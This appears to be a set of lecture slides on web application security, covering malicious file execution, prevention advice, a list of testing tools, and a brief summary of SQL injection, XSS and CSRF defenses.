– What is Malicious File Execution
• When developers program applications to use input files provided by the user and the bad guy is the one entering the file, a malicious file is executed unknowingly; thus we have malicious file execution.
• Malicious file execution attacks can occur any time the application accepts filenames or files from users.
• When these files are executed, they can be used to do just about anything from stealing data to taking over the entire system.
– Prevention
• Strongly validate user input using "accept known good" as a strategy, or isolate incoming files and check their legitimacy before executing them.
• Disable certain PHP commands: I suggest that you visit the OWASP website to see what commands to disable.
Tools
• Browser Developer Tools
• Wireshark
• Burp Proxy
• SQLMap
• OWASP Broken Web Apps Project
– https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
• Google Gruyere
– https://google-gruyere.appspot.com/
Summary
SQL Injection
• Bad input checking allows malicious SQL query
• Known defenses address problem effectively

XSS – Cross-site scripting
• Problem stems from echoing untrusted input
• Difficult to prevent; requires care, testing, tools, …

CSRF – Cross-site request forgery
• Forged request leveraging ongoing session
• Can be prevented (if XSS problems fixed)

Other server vulnerabilities
• Increasing knowledge embedded in frameworks, tools, application development recommendations